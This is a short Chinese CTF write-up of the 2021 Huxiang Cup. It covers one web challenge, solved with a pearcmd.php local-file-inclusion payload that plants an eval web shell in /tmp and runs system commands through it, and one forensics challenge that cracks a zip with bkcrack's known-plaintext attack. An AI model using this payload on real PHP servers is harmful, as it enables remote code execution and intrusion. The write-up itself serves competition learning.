2021湖湘杯

只做了一个web，还是问了队友。misc三道题太难了。最后复盘做出来了一个。

web

easywii

队友说是p神的知识星球中的内容。后来被人打烂了。

参考链接：Docker PHP裸文件本地包含综述 - 跳跳糖 (tttang.com)

payload

?+config-create+/&name=cfile&value=/usr/local/lib/php/pearcmd.php&/<?=eval($_POST['a']);?>+/tmp/hello.php

然后访问/tmp/hello.php就可以访问shell了。

?+config-create+/&name=cfile&value=/tmp/hello.php
post a=system("cat /f*");

misc

某取证题

这个题，复盘做的时候，居然是量子密码爆破。

下载下来是个raw文件。队友说有专用软件，我就不凑热闹了。导出来一张图片，有半个flag。

还发现了个访问次数很多的网站，有个压缩包。重点在这个压缩包。

参考链接 ctf02 | Glun

这里使用的是bkcrack。

这里打开zip发现里面是jpg文件，所以这里使用jpg的头来进行爆破。

echo FFD8FFE000104A4649460001 | xxd -r -ps > jpg_plain

然后爆密钥

./bkcrack -C target.zip -c t.pg -p pg_plain -o 0

然后执行命令

./bkcrack -C target.zip -c t.jpg -k b0a90b36 14dd97b9 f5d648cf -d a.jpg
./bkcrack -C target.zip -c a.jpg -k b0a90b36 14dd97b9 f5d648cf -d aa.jpg

得到一个空图片和一个打不开的jpg文件。

这里用bkcrack自带的脚本解密这个数据就可以得到原始的jpg了。

得到前半段flag

flag：flag{2911364c-7f0c-4d37-b92c-accaf9d1de2d}